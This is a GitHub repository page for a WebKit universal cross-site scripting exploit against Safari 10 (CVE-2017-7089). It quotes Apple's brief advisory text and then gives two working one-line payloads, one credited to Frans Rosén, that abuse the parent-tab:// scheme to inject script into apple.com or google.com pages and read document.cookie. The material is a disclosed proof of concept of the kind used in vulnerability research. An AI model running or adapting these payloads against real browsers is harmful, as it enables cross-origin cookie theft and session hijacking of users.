Skip to content

Bo0oM/CVE-2017-7089

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 

Repository files navigation

CVE-2017-7089

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A logic issue existed in the handling of the parent-tab. This issue was addressed with improved state management.

Safari 10

Local SOP bypass
<script> function Pew(){var doc=open('parent-tab://apple.com');doc.document.body.innerHTML='<img src=q onerror=alert(document.cookie)>';}</script><button onclick=Pew();>Click me!</button>
Exploit by Frans Rosén
data:text/html,<script>function y(){x=open('parent-tab://google.com','_top'),x.document.body.innerHTML='<img/src=""onerror="alert(document.cookie)">'};setTimeout(y,100)</script>

About

Webkit uxss exploit (CVE-2017-7089)

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages